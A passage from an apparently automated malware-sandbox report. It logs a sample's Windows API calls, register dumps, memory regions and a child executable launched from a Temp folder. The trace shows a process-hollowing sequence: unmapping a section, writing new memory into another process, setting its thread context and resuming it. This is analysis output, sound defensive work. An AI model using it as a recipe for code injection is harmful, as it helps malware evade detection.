[22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0096.530] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0096.531] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0096.531] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0096.531] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x1b4780*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1b4780*, lpNumberOfBytesWritten=0x0) returned 1 [0096.531] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x1b4b80, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0096.531] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x1b4b80*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1b4b80*, lpNumberOfBytesWritten=0x0) returned 1 [0096.538] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x209180*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x209180*, lpNumberOfBytesWritten=0x0) returned 1 [0096.538] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x1b48b4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1b48b4*, lpNumberOfBytesWritten=0x0) returned 1 [0096.539] SetThreadContext (hThread=0x48, lpContext=0x150000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0096.540] ResumeThread (hThread=0x48) returned 0x1 [0096.540] CloseHandle (hObject=0x48) returned 1 [0096.540] CloseHandle (hObject=0x4c) returned 1 [0096.540] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.541] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0096.541] ExitProcess (uExitCode=0x0) Process: id = "15" image_name = "yaqb5zg8.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe" page_root = "0x7ea16820" os_pid = "0xb58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xb0c" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 944 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 945 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 946 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 947 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "yaqb5zg8.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe") Region: id = 948 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 949 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 950 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 951 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 952 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 953 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 954 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 955 start_va = 0x140000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 956 start_va = 0x240000 end_va = 0x2a6fff entry_point = 0x240000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 957 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 958 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 959 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 960 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 961 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 962 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 963 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 964 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 965 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 966 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 967 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1038 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1039 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 1040 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1041 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1042 start_va = 0x11a0000 end_va = 0x138ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1336 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1337 start_va = 0x11a0000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1338 start_va = 0x1380000 end_va = 0x138ffff entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 1339 start_va = 0x11a0000 end_va = 0x127efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 1340 start_va = 0x1340000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 1341 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1342 start_va = 0x3a0000 end_va = 0x3a2fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1343 start_va = 0x3a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Thread: id = 16 os_tid = 0xb5c [0096.085] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x778dee60, dwHighDateTime=0x1d440a9)) [0096.085] GetCurrentProcessId () returned 0xb58 [0096.085] GetCurrentThreadId () returned 0xb5c [0096.085] GetTickCount () returned 0x230c0 [0096.085] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=15287440672) returned 1 [0096.085] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0096.086] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0096.086] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0096.086] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0096.086] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0096.086] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0096.086] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0096.087] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0096.088] GetCurrentThreadId () returned 0xb5c [0096.088] GetStartupInfoW (in: 